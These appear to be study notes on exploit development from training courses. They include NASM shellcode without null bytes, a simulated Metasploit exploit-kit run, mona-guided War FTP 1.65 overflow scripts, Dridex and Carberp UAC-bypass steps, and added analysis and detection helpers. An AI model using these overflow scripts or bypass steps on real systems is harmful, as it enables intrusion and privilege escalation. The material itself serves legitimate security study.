Let’s Learn: Preparing Shellcode in NASM

Goal: produce compact shellcode in NASM with no 0x00 padding bytes, so it can be embedded in an exploit buffer
Source: OpenSecurityTraining “Software Exploits”
Attempt I:

; ;;;;;;;;;;;;;;;;;;;;;;;;
; basic 'Hello World' in nasm
; compile with: nasm -f elf hello.asm; ld -m elf_i386 -o hello hello.o
; (-m elf_i386 is only needed when linking on a 64-bit host)
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .data
msg db 'Hello World', 0xa
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
global _start
_start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; write(int fd, char *msg, unsigned int len)
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov eax, 4          ; SYS_write; a 32-bit immediate assembles with 0x00 padding bytes
mov ebx, 1          ; stdout
mov ecx, msg        ; absolute address of msg: the code is not position independent (fixed in Attempt III)
mov edx, 12         ; 'Hello World' plus the newline is 12 bytes
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
; exit(int ret)
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov eax, 1          ; SYS_exit
mov ebx, 0
int 0x80

Attempt II (use the 8-bit register forms so the immediates carry no padding):

; ;;;;;;;;;;;;;;;;;;;;;;;;
section .data
msg db 'Hello World', 0xa
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
global _start
_start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; write(1, msg, 12): the 8-bit moves encode as two bytes with no 0x00 padding
; (this relies on the registers being zero at process start; Attempt III clears them explicitly)
mov al, 4
mov bl, 1
mov ecx, msg
mov dl, 12
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
; exit(0)
mov al, 1
mov bl, 0
int 0x80

Attempt III (make the code position independent: build the string on the stack instead of addressing .data):
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
global _start
_start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; clear out the registers we need (xor reg, reg encodes without 0x00 bytes)
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
; write(int fd, char *msg, unsigned int len)
mov al, 4
mov bl, 1
; Owned!!\n = 4f,77,6e,65,64,21,21,0a; pushed as reversed 4-byte chunks so the string reads forward in memory
; push \n,!,!,d
push 0x0a212164
; push e,n,w,O
push 0x656e774f
mov ecx, esp        ; the string now lives on the stack; pass its address to write()
mov dl, 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
; exit(0)
mov al, 1
xor ebx, ebx        ; not 'mov bl, 0': that encodes as b3 00 and would put a 0x00 byte in the shellcode
int 0x80

Attempt IV (remove the 0xa newline byte, a common bad character in input-based delivery):

; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
global _start
_start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; clear out the registers we need
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
; write(int fd, char *msg, unsigned int len)
mov al, 4
mov bl, 1
; Owned!!! = 4f,77,6e,65,64,21,21,21 (the trailing 0x0a replaced by a third '!')
; push !,!,!,d
push 0x21212164
; push e,n,w,O
push 0x656e774f
mov ecx, esp        ; address of the string on the stack
mov dl, 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
; exit(0)
mov al, 1
xor ebx, ebx        ; avoids the 0x00 byte that 'mov bl, 0' (b3 00) would introduce
int 0x80
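Added example (not part of the OpenSecurityTraining material): a byte-level check of the goals above. It hand-assembles the instruction forms used in the four attempts, builds the push immediates from a string the way the Attempt III comments do, and reports every 0x00 or 0x0a byte in the result; the encodings are assumed from the 32-bit x86 opcode map and should be confirmed with nasm -f bin before relying on them.

```python
import struct

# Hand-assembled 32-bit x86 encodings of the instructions used above (assumed correct).
ENC = {
    "mov eax, 4":   b"\xb8\x04\x00\x00\x00",  # 32-bit immediate: three padding nulls
    "mov al, 4":    b"\xb0\x04",              # 8-bit form: no padding
    "mov bl, 1":    b"\xb3\x01",
    "mov bl, 0":    b"\xb3\x00",              # the zero itself is a null byte
    "mov al, 1":    b"\xb0\x01",
    "mov dl, 8":    b"\xb2\x08",
    "xor eax, eax": b"\x31\xc0",
    "xor ebx, ebx": b"\x31\xdb",
    "xor ecx, ecx": b"\x31\xc9",
    "xor edx, edx": b"\x31\xd2",
    "mov ecx, esp": b"\x89\xe1",
    "int 0x80":     b"\xcd\x80",
}

def push_immediates(text):
    """Split text into 4-byte chunks and return the little-endian immediates in
    push order (last chunk first), which the Attempt III comments work out by hand."""
    data = text.encode()
    if len(data) % 4:
        raise ValueError("pad the string to a multiple of 4 bytes first")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    return [struct.unpack("<I", c)[0] for c in reversed(chunks)]

def assemble(lines):
    """Concatenate encodings; 'push 0x...' lines are encoded as 68 + imm32."""
    out = b""
    for line in lines:
        if line.startswith("push "):
            out += b"\x68" + struct.pack("<I", int(line[5:], 16))
        else:
            out += ENC[line]
    return out

def find_bad_bytes(code, bad=b"\x00\x0a"):
    """Return (offset, value) for every byte that breaks C-string or line-based
    delivery: 0x00 terminates strcpy-style copies, 0x0a ends a line."""
    return [(i, b) for i, b in enumerate(code) if b in bad]

def attempt_iv(exit_ebx="mov bl, 0"):
    """The Attempt IV sequence (with ecx set to esp before the write call); the exit
    register clear is a parameter so both variants can be compared."""
    return ["xor eax, eax", "xor ebx, ebx", "xor ecx, ecx", "xor edx, edx",
            "mov al, 4", "mov bl, 1"] + \
           ["push 0x%08x" % imm for imm in push_immediates("Owned!!!")] + \
           ["mov ecx, esp", "mov dl, 8", "int 0x80", "mov al, 1", exit_ebx, "int 0x80"]

if __name__ == "__main__":
    for name, code in [("mov eax, 4", ENC["mov eax, 4"]),
                       ("attempt IV", assemble(attempt_iv())),
                       ("attempt IV, xor exit", assemble(attempt_iv("xor ebx, ebx")))]:
        print("%-22s %3d bytes, bad bytes at %s" % (name, len(code), find_bad_bytes(code)))
```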

Exploit Kit Experience Demonstration

Learning Outcome:

  • Simulate an exploit kit (EK) attack: host a set of relevant browser exploits (delivered through a malicious iframe injected into a fake "Java Required" page), with the end goal of downloading and running Radmin, a remote administration tool, bundled with a reverse_tcp shellcode back-connect, on the victim host.

Setup:

  • Set up a local HTTP server serving the browser exploit modules available in the Metasploit Framework

Outcome:

  • I. Windows 7, Chromium browser -> served with 6 exploits
  • II. Windows 7, Firefox 46.0 browser -> served with 10 exploits

Here is an interesting request from the captured traffic:
-> 192.168.0.192:8080
GET /?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6RmlyZWZveDozNS4wOg== HTTP/1.1
Host: 192.168.0.192:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.192:8080/
Connection: keep-alive

Decoded: sessid = base64encoded("Windows 7:undefined:undefined:undefined:undefined:en-US:x86:Firefox:35.0:"). Note that the fingerprint's Firefox version (35.0) differs from the one in the User-Agent header (46.0): the token carries what the landing page's JavaScript detected (the detected_version object the rotator tests below), not the raw header.

All in all, we are served two PHP files:

1 – the exploit rotator, and
2 – the exploit enumerator

Here is the rotator script, captured with Fiddler on the data request:
global_exploit_list[global_exploit_list.length] = {
  'test': 'if (!ua_ver_lt(detected_version[\'ua_version\'], \'15.0\') && !ua_ver_gt(detected_version[\'ua_version\'], \'22.0\')) { is_vuln = true;} else { is_vuln = false; }',
  'resource': '/UmOgoQAuaH'};
global_exploit_list[global_exploit_list.length] = {
  'test': 'if (!ua_ver_lt(detected_version[\'ua_version\'], \'22.0\') && !ua_ver_gt(detected_version[\'ua_version\'], \'27.0\')) { is_vuln = true;} else { is_vuln = false; }',
  'resource': '/AcOkePbJp'};
global_exploit_list[global_exploit_list.length] = {
  'test': 'is_vuln = navigator.javaEnabled()',
  'resource': '/LcfQAkA'};
global_exploit_list[global_exploit_list.length] = {
  'test': 'is_vuln = navigator.javaEnabled()',
  'resource': '/usBkaxsZ'};
global_exploit_list[global_exploit_list.length] = {
  'test': 'is_vuln = navigator.javaEnabled()',
  'resource': '/qMVrLY'};
global_exploit_list[global_exploit_list.length] = {
  'test': 'is_vuln = navigator.javaEnabled()',
  'resource': '/XhgZgfkin'};
global_exploit_list[global_exploit_list.length] = {
  'test': 'is_vuln = navigator.javaEnabled()',
  'resource': '/pUHbtcUl'};
global_exploit_list[global_exploit_list.length] = {
  'test': 'is_vuln = navigator.javaEnabled()',
  'resource': '/KCHgwKCyyIb'};
global_exploit_list[global_exploit_list.length] = {
  'test': 'if (!ua_ver_lt(detected_version[\'ua_version\'], \'5.0\') && !ua_ver_gt(detected_version[\'ua_version\'], \'15.0.1\')) { is_vuln = true;} else { is_vuln = false; }',
  'resource': '/FBapzEXZJVcM'};
global_exploit_list[global_exploit_list.length] = {
  'test': 'if (!ua_ver_lt(detected_version[\'ua_version\'], \'3.5\') && !ua_ver_gt(detected_version[\'ua_version\'], \'3.6.16\')) { if (navigator.userAgent.indexOf(\'Windows NT 5.1\') != -1 || navigator.javaEnabled()) { is_vuln = true; }} else { is_vuln = false; }',
  'resource': '/YLDbvbb'};

window.next_exploit(0);
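Added example, not part of the original write-up: decode the captured sessid token and evaluate the rotator's tests offline, so an analyst handling a capture like this can tell which landing resources a given fingerprint would be routed to. Names for the four "undefined" fields are assumptions, and ua_ver_lt/ua_ver_gt are assumed to compare dotted numeric versions.

```python
import base64

# sessid copied from the captured GET request above
CAPTURED_SESSID = ("V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5l"
                   "ZDplbi1VUzp4ODY6RmlyZWZveDozNS4wOg==")

# Field names after the OS are assumptions; the capture only shows "undefined" for them.
FIELDS = ["os", "field1", "field2", "field3", "field4", "lang", "arch", "ua_name", "ua_version"]

def decode_sessid(sessid):
    """The token is plain base64 over colon-separated fingerprint fields."""
    values = base64.b64decode(sessid).decode("utf-8").split(":")
    return dict(zip(FIELDS, values))

def ver_tuple(v):
    return tuple(int(p) for p in v.split("."))

def ua_ver_lt(a, b):   # stand-ins for the rotator's helpers (assumed semantics)
    return ver_tuple(a) < ver_tuple(b)

def ua_ver_gt(a, b):
    return ver_tuple(a) > ver_tuple(b)

# Transcription of the captured global_exploit_list as (test, resource).
# "range" = inclusive ua_version range; "java" = navigator.javaEnabled();
# "range_xp_or_java" = range plus (Windows NT 5.1 in the UA or Java enabled).
ROTATOR = [
    (("range", "15.0", "22.0"), "/UmOgoQAuaH"),
    (("range", "22.0", "27.0"), "/AcOkePbJp"),
    (("java",), "/LcfQAkA"),
    (("java",), "/usBkaxsZ"),
    (("java",), "/qMVrLY"),
    (("java",), "/XhgZgfkin"),
    (("java",), "/pUHbtcUl"),
    (("java",), "/KCHgwKCyyIb"),
    (("range", "5.0", "15.0.1"), "/FBapzEXZJVcM"),
    (("range_xp_or_java", "3.5", "3.6.16"), "/YLDbvbb"),
]

def served_resources(ua_version, java_enabled=False, user_agent=""):
    """Resources whose test would set is_vuln = true for this fingerprint, in the
    order window.next_exploit() walks the list."""
    hits = []
    for test, resource in ROTATOR:
        kind = test[0]
        if kind == "java":
            is_vuln = java_enabled
        else:
            in_range = (not ua_ver_lt(ua_version, test[1])
                        and not ua_ver_gt(ua_version, test[2]))
            if kind == "range":
                is_vuln = in_range
            else:  # the last entry only sets is_vuln inside the range when XP or Java is present
                is_vuln = in_range and ("Windows NT 5.1" in user_agent or java_enabled)
        if is_vuln:
            hits.append(resource)
    return hits

if __name__ == "__main__":
    fp = decode_sessid(CAPTURED_SESSID)
    print(fp)
    print("would be routed to:", served_resources(fp["ua_version"], java_enabled=True))
```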

Finding Exploit-Friendly Instructions

Source: Gray Hat Python

After you have obtained EIP control, you have to transfer execution to your shellcode. Typically, you will have a register or an offset from a register that points to your shellcode, and it’s your job to find an instruction somewhere in the executable or one of its loaded modules that will transfer control to that address.
========

from immlib import *

def main(args):
    imm = Debugger()
    # the instruction to look for (e.g. "jmp esp") arrives as the script's arguments
    search_code = " ".join(args)
    search_bytes = imm.Assemble(search_code)
    search_results = imm.Search(search_bytes)

    for hit in search_results:
        # Retrieve the memory page where this hit exists
        # and make sure it's executable
        code_page = imm.getMemoryPagebyAddress(hit)
        access = code_page.getAccess(human=True)

        if "execute" in access.lower():
            imm.log("[*] Found: %s (0x%08x)" % (search_code, hit), address=hit)

    return "[*] Finished searching for instructions, check the Log window."

========

Writing Exploits with Mona

Source: http://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html

0. Open the target in Immunity Debugger
1. !mona update
2. Attach to the process
3. !mona config -set workingfolder c:\logs\%p
4. !mona pattern_create 2000
5. !mona pattern_offset 37694136 (the EIP value at the time of the crash)
6. Modify the script:

print("Creating exploit.")
# Create the file
push = "A" * 260    # offset found with mona pattern_offset
eip = "BBBB"        # 4 more bytes, these overwrite EIP
junk = "C" * 1736   # will later be replaced with real shellcode
try:
    f = open("crash-me.PLF", "w")
    f.write(push + eip + junk)
    f.close()
    print("File created")
except IOError:
    print("File cannot be created")

Our next goals will be:
1. Replace "BBBB" with a valid pointer (a pointer to an instruction that jumps to ESP, as ESP will point at the shellcode).
2. Solve the (easy) problem of the "CCCC…" bytes that follow EIP.
3. Replace "CCCC…" with real shellcode.

7. !mona jmp -r esp -o

War FTP 1.65 Buffer Overflow Part 1

Source: Cybrary: Advanced Penetration Testing

  • Give the program too much input in the username (USER) field
  • The saved return pointer will be overwritten with our attacker-controlled input

Immunity Debugger

  • Go to File ->Attach -> war-ftpd

Setup Logging:

  • !mona config -set workingfolder C:\logs\%p

Identifying the Overwrite

  • !mona pattern_create 1100

===============================================================
  Output generated by mona.py v2.0, rev 566 – Immunity Debugger
===============================================================
  OS : xp, release 5.1.2600
  Process being debugged : war-ftpd (pid 4332)
  Current mona arguments: pattern_create 1100
===============================================================
===============================================================

Pattern of 1100 bytes :
-----------------------

ASCII:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk

HEX:

JAVASCRIPT (unescape() friendly):

Exploit:
#!/usr/bin/python
import socket

#buffer = "A" * 1100
# the 1100-byte output of !mona pattern_create 1100
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.0.58', 21))
response = s.recv(1024)
print(response)
s.send(('USER ' + buffer + '\r\n').encode())
response = s.recv(1024)
print(response)
s.send(b'PASS PASSWORD\r\n')
s.close()

After the exploit hits War FTP -> !mona findmsp
Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory.

It reports whether the pattern landed in a register (e.g. EIP) and at which offset from the beginning of the pattern:

  • EIP contains normal pattern : 0x32714131 (offset 485)
  • ESP (0x00affd48) points at offset 493 in normal pattern (length 607)
  • EDI (0x00affe48) points at offset 749 in normal pattern (length 351)
  • EBP (0x00affda0) points at offset 581 in normal pattern (length 519)

Verifying Offsets
#!/usr/bin/python
import socket

# 485 bytes reach the saved return address, 4 bytes overwrite it, the rest fills up to 1100
buffer = "A" * 485 + "B" * 4 + "C" * 611

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.20.10', 21))
response = s.recv(1024)
print(response)
s.send(('USER ' + buffer + '\r\n').encode())
response = s.recv(1024)
print(response)
s.send(b'PASS PASSWORD\r\n')
s.close()
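Added example (not mona's own code): regenerate the Aa0Aa1... cyclic pattern and look a crash value up in it, reproducing offline the pattern_create / pattern_offset / findmsp results quoted in this and the previous section (0x37694136 at offset 260, 0x32714131 at offset 485).

```python
import string
import struct

def pattern_create(length):
    """Metasploit/mona-style cyclic pattern: triplets of (upper, lower, digit).
    Every 4-byte window is unique within the first 20280 bytes, so four bytes
    read out of a register identify exactly one offset."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def pattern_offset(value, length=20280):
    """Locate a 32-bit register value as shown by the debugger (e.g. 0x32714131).
    Returns (offset, 'normal') for a little-endian hit, (offset, 'reverse') when
    the bytes occur reversed, and (None, None) if the value is not from the pattern."""
    pat = pattern_create(length).encode()
    le = struct.pack("<I", value)
    off = pat.find(le)
    if off != -1:
        return off, "normal"
    off = pat.find(le[::-1])
    if off != -1:
        return off, "reverse"
    return None, None

def room_after(offset, length):
    """Pattern bytes from `offset` to the end: the 'length' figure findmsp prints
    next to a register that points into the pattern, i.e. the space available there."""
    return length - offset

if __name__ == "__main__":
    print(pattern_offset(0x37694136, 2000))  # (260, 'normal'): the mona pattern_offset step
    print(pattern_offset(0x32714131, 1100))  # (485, 'normal'): EIP in the War FTP crash
    print(room_after(493, 1100))             # 607: pattern bytes after where ESP points
```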

UAC Bypass Method: Application Compatibility a/k/a Dridex Method

This UAC bypass method relies on manipulating application compatibility (shim) databases.

Method of Operation:

  1. Dridex creates an application compatibility database ($$$.sdb), a batch file ($$$.bat) and a copy of itself (edg3FAC.exe).
  2. Dridex uses sdbinst, the command that installs and uninstalls application compatibility databases, to install $$$.sdb.
  3. Dridex launches the iscsicli command, a command-line tool for the iSCSI initiator. The configuration in the installed application compatibility database ($$$.sdb), however, causes iscsicli.exe to execute $$$.bat with administrative privileges.
  4. $$$.bat executes edg3FAC.exe with administrative privileges.
  • Auto-elevation programs such as sdbinst.exe and iscsicli.exe elevate to administrative privileges when launched, without a UAC prompt being displayed.
  • The sdbinst command, which can change the behaviour of other programs, is itself an auto-elevation program.

1. ucmInitAppHelp
* Purpose:
*Initialize AppHelp routines.

2. ucmRegisterAndRunTarget
* Purpose:
* Register shim database and execute target app.

3. ucmShimRedirectEXE
* Purpose:
* Build, register shim database and execute target app.
* Initially used in BlackEnergy2 and Gootkit by mzH (alive-green).
* Currently used in a number of trojans (Win32/Dyre, WinNT/Cridex)

// Fragment of ucmShimRedirectEXE: inside the EXE entry (tidEXE, opened earlier in the
// function) a RedirectEXE shim is declared whose command line is the payload to launch.
tidShim = SdbBeginWriteListTag(hShimDb, TAG_SHIM_REF);
if (tidShim != TAGID_NULL) {
    SdbWriteStringTag(hShimDb, TAG_NAME, L"RedirectEXE");
    SdbWriteStringTag(hShimDb, TAG_COMMAND_LINE, lpszPayloadEXE);
    SdbEndWriteListTag(hShimDb, tidShim);
}
SdbEndWriteListTag(hShimDb, tidEXE);

4. ucmAppcompatElevation
* Purpose:
* AutoElevation using Application Compatibility engine.



UAC Bypass: The Carberp Style

  • Wusa method used by Win32/Carberp


// UACMe tables for the two Wusa method variants: directory under %WINDIR%, the
// auto-elevated application, the DLL it loads, and the fake .msu that carries the DLL
static const char* uacTargetDir[] = { "system32\\sysprep", "ehome" };
static const char* uacTargetApp[] = { "sysprep.exe", "mcx2prov.exe" };
static const char* uacTargetDll[] = { "cryptbase.dll", "CRYPTSP.dll" };
static const char* uacTargetMsu[] = { "cryptbase.msu", "CRYPTSP.msu" };

Steps to reproduce:
1. Make a .cab archive containing your own cryptbase.dll or wdscore.dll and rename it to .MSU
2. Deploy .MSU to any system directory you want with wusa.exe. For example: wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz
3. Run migwiz.exe


1. ucmWusaExtractPackage
* Purpose:
* Extract cab to protected directory using wusa.

2. ucmWusaMethod
* Purpose:
* Build and install fake msu package then run target application.

3. ucmCreateCabinetForSingleFile
* Purpose:
* Build a cabinet for use in methods that require a single file
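Added example (not from the referenced sources): process-creation log triage for the two auto-elevation chains described above, the Dridex sdbinst/iscsicli chain and the Carberp-style wusa /extract. The events are constructed for this example in a Sysmon-like shape; the Image/ParentImage/CommandLine field names, the paths under C:\Users\bob and the rule thresholds are assumptions.

```python
import re

# Binaries the notes above identify as auto-elevating without a UAC prompt.
AUTO_ELEVATE = {"sdbinst.exe", "iscsicli.exe", "wusa.exe"}

# Constructed events: the Dridex chain (1-3), a Carberp-style wusa extract (4) and a
# benign Windows Update call (5). Everything under C:\Users\bob is made up for this example.
EVENTS = [
    {"Image": r"C:\Windows\System32\sdbinst.exe",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\edg3FAC.exe",
     "CommandLine": r"sdbinst.exe -q C:\Users\bob\AppData\Local\Temp\$$$.sdb"},
    {"Image": r"C:\Windows\System32\iscsicli.exe",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\edg3FAC.exe",
     "CommandLine": "iscsicli.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\iscsicli.exe",
     "CommandLine": r"cmd /c C:\Users\bob\AppData\Local\Temp\$$$.bat"},
    {"Image": r"C:\Windows\System32\wusa.exe",
     "ParentImage": r"C:\Users\bob\Downloads\dropper.exe",
     "CommandLine": r"wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz"},
    {"Image": r"C:\Windows\System32\wusa.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"wusa.exe C:\Windows\SoftwareDistribution\Download\update.msu /quiet"},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def under_windows_dir(path):
    p = path.lower().strip('"').replace("%windir%", "c:\\windows")
    return p.startswith("c:\\windows\\")

def triage(event):
    """Return the rule names the event trips (empty list = nothing suspicious)."""
    img = basename(event["Image"])
    parent = event["ParentImage"]
    cmd = event["CommandLine"].lower()
    findings = []
    # Both methods start by launching an auto-elevating binary from the malware itself.
    if img in AUTO_ELEVATE and not under_windows_dir(parent):
        findings.append("auto-elevating binary started by a non-system parent")
    # Dridex step 2: sdbinst installing a shim database from a user-writable location.
    if img == "sdbinst.exe":
        m = re.search(r'"([^"]+\.sdb)"|(\S+\.sdb)', cmd)
        if m and not under_windows_dir(m.group(1) or m.group(2)):
            findings.append("shim database installed from outside the Windows directory")
    # Dridex steps 3-4: iscsicli.exe is a CLI tool that should not spawn children.
    if basename(parent) == "iscsicli.exe":
        findings.append("child process spawned by iscsicli.exe")
    # Carberp step 2: wusa /extract: into a protected directory.
    if img == "wusa.exe":
        m = re.search(r"/extract:(\S+)", cmd)
        if m and under_windows_dir(m.group(1)):
            findings.append("wusa extracting a package into the Windows directory")
    return findings

if __name__ == "__main__":
    for i, ev in enumerate(EVENTS, 1):
        print(i, basename(ev["Image"]), triage(ev))
```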